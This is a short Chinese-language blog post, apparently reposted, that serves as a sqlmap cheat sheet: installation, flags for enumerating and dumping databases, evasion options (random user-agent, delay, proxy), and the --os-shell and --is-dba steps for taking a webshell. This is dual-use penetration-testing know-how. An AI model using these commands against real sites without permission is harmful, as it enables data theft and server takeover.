安裝:
下載地址:https://github.com/sqlmapproject/sqlmap
下載好后直接解壓,并且加入環境變數,就可以直接在cmd呼叫
常用基礎指令:
-u 指定注入點
--dbs 跑庫名
--tables 跑表名
--columns 跑欄位名
--dump 列舉資料
-D 指定庫 -T 指定表 -C 指定欄位
sqlmap.py -u IP地址 -D 庫名 -T 表名 -C 欄位1,欄位2 --dump
常見指令:
# 選擇隨機user-agents頭
--random-agent
# 每次探測延時1秒(防止訪問過快被ban)
--delay=1
# 查看資料量
--count
# 使用本地1080埠
--proxy "http://127.0.0.1:1080"
# 1-5 測驗等級(最低1,最高5) level等級越高檢測越詳細
--level
例如 level大于2會檢測cookie注入,大于3會檢測頭注入
# 查詢當前用戶權限,如果DBA是True可以嘗試直接拿webshell
--is-dba
# 嘗試往網站中放入一個cmdshell(就是擁有cmd權限的shell),先選擇寫入shell的腳本語言
--os-shell
# 清空快取重新測驗
--flush-session
注:有的需要填寫網站的web目錄的絕對路徑,有的可以直接選擇好shell的腳本語言型別就可以直接拿shell
超詳細Sqlmap指令手冊:https://www.cnblogs.com/hongfei/p/3872156.html
安裝瀏覽器插件的文章地址:https://www.zkaq.org/t/3683.html
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/55242.html
標籤:其他
上一篇:SQL注入:盲注
下一篇:實驗報告 一